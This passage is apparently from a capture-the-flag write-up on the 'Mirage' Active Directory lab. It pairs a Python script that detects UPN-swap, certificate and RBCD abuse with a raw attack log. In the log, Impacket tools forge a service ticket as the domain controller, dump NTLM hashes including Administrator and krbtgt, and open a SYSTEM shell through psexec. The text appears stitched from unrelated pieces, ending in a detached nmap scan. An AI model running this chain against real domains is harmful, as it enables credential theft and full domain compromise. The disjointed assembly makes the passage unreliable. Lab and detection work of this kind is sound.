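    # Benign rename: the new UPN matches the account's own name, so it must not alert.
    {"id": 4738, "t": "2025-09-01T09:00:00", "actor": "helpdesk1", "target": "alice.smith",
     "attr": "User Principal Name", "old": "asmith@mirage.htb", "new": "alice.smith@mirage.htb"},
]
RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"


def ts(e):
    return datetime.fromisoformat(e["t"])


def upn_local(upn):
    return upn.split("@", 1)[0].lower()


def upn_swaps(events):
    """4738 events that rewrite a user's UPN to a name that is not the user's own sAMAccountName."""
    return [e for e in events if e["id"] == 4738 and e["attr"] == "User Principal Name"
            and upn_local(e["new"]) != e["target"].lower()]


def cert_upn_mismatches(events):
    """4887 events where the issued certificate's UPN does not belong to the requester."""
    return [e for e in events if e["id"] == 4887 and upn_local(e["upn"]) != e["actor"].lower()]


def rbcd_on_dcs(events):
    """5136 writes to msDS-AllowedToActOnBehalfOfOtherIdentity on a Domain Controllers object."""
    return [e for e in events if e["id"] == 5136 and e["attr"].lower() == RBCD_ATTR
            and "ou=domain controllers" in e["dn"].lower()]


def correlate(events, window=timedelta(hours=1)):
    """Chain a UPN swap with a certificate issued for the swapped UPN inside the window, and
    escalate to 'critical' if RBCD is then written on a DC within the window after the cert."""
    alerts = []
    for swap in upn_swaps(events):
        sev = "high" if upn_local(swap["new"]).endswith("$") else "medium"
        alerts.append((swap["t"], sev, f"{swap['actor']} set UPN of {swap['target']} to {swap['new']}"))
        for cert in cert_upn_mismatches(events):
            if cert["upn"].lower() == swap["new"].lower() and timedelta(0) <= ts(cert) - ts(swap) <= window:
                sev, msg = "high", f"{cert['actor']} obtained certificate for {cert['upn']} after UPN swap"
                for rbcd in rbcd_on_dcs(events):
                    if timedelta(0) <= ts(rbcd) - ts(cert) <= window:
                        sev, msg = "critical", msg + f"; RBCD then written on {rbcd['dn']}"
                alerts.append((cert["t"], sev, msg))
    return alerts


if __name__ == "__main__":
    for t, sev, msg in correlate(EVENTS):
        print(t, sev.upper(), msg)
```

Object access auditing on the DC's computer object and certificate services auditing must be enabled for the 5136 and 4887 events to exist at all.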
getST.py -spn 'cifs/DC01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.129.232.163 'mirage.htb/Mirage-Service$' -hashes :7a77d15fb5a4b7035ef2524b1cc4142f
[SNIP]
[*] Saving ticket in dc01$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache
export KRB5CCNAME='dc01$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache'
secretsdump.py -k -no-pass -dc-ip 10.129.232.163 dc01.mirage.htb
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1adcc3d4a7f007ca8ab8a3a671a66127:::
mirage.htb\Dev_Account_A:1104:aad3b435b51404eeaad3b435b51404ee:3db621dd880ebe4d22351480176dba13:::
mirage.htb\Dev_Account_B:1105:aad3b435b51404eeaad3b435b51404ee:fd1a971892bfd046fc5dd9fb8a5db0b3:::
mirage.htb\david.jjackson:1107:aad3b435b51404eeaad3b435b51404ee:ce781520ff23cdfe2a6f7d274c6447f8:::
[SNIP]
Administrator:7be6d4f3c2b9c0e3560f5a29eeb1afb3
getTGT.py -dc-ip 10.129.232.163 -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3 mirage.htb/Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass dc01.mirage.htb
psexec.py -k -no-pass dc01.mirage.htb
/home/kali/BOXES/MIRAGE/10.129.232.163/certipy-venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc01.mirage.htb.....
[*] Found writable share ADMIN$
[*] Uploading file jrIugbnc.exe
[*] Opening SVCManager on dc01.mirage.htb.....
[*] Creating service SBYR on dc01.mirage.htb.....
[*] Starting service SBYR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
dc01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
dc01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 014F-FCE7
Directory of C:\Users\Administrator\Desktop
07/04/2025 01:03 PM <DIR> .
05/25/2025 02:54 PM <DIR> ..
08/31/2025 03:26 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4,077,596,672 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
52741/tcp open unknown
60221/tcp open unknown
60222/tcp open unknown
60237/tcp open unknown
60243/tcp open unknown
60267/tcp open unknown
64735/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-31T22:35:54
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 6h12m08s
